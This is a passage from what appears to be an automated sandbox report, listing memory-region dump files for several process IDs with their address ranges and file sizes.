                                                                                                                                                                5.9MB

                                                                                                                                                              • memory/2676-243-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-18-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-19-0x00000000011C1000-0x00000000011EF000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                184KB

                                                                                                                                                              • memory/2676-20-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-394-0x0000000006990000-0x0000000006EF7000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                5.4MB

                                                                                                                                                              • memory/2676-22-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-29-0x000000000A0B0000-0x000000000A560000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-339-0x0000000006990000-0x0000000006F7C000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                5.9MB

                                                                                                                                                              • memory/2676-28-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-88-0x0000000006990000-0x0000000006E51000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.8MB

                                                                                                                                                              • memory/2676-120-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-136-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-332-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-247-0x0000000006990000-0x0000000006E51000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.8MB

                                                                                                                                                              • memory/2676-418-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-220-0x000000000A0B0000-0x000000000A560000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-219-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-192-0x00000000011C0000-0x0000000001670000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                4.7MB

                                                                                                                                                              • memory/2676-137-0x0000000006990000-0x0000000006EF7000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                5.4MB

                                                                                                                                                              • memory/3256-395-0x0000000003EA0000-0x00000000047F8000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                9.3MB

                                                                                                                                                              • memory/3256-396-0x0000000003EA0000-0x00000000047F8000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                9.3MB

                                                                                                                                                              • memory/3256-397-0x0000000003EA0000-0x00000000047F8000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                9.3MB

                                                                                                                                                              • memory/3372-480-0x0000000000A30000-0x0000000001388000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                9.3MB

                                                                                                                                                              • memory/3372-479-0x0000000000A30000-0x0000000001388000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                9.3MB

                                                                                                                                                              • memory/3816-1059-0x0000000019F00000-0x000000001A1E2000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                2.9MB

                                                                                                                                                              • memory/3816-1060-0x0000000000950000-0x0000000000958000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                32KB

                                                                                                                                                              • memory/4080-498-0x0000000000800000-0x000000000081C000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                112KB

                                                                                                                                                              • memory/4080-497-0x00000000053C0000-0x00000000054AC000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                944KB

                                                                                                                                                              • memory/4080-496-0x0000000004EE0000-0x0000000004FE6000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                1.0MB

                                                                                                                                                              • memory/4080-495-0x00000000001E0000-0x000000000057C000-memory.dmp
                                                                                                                                                                Filesize

                                                                                                                                                                3.6MB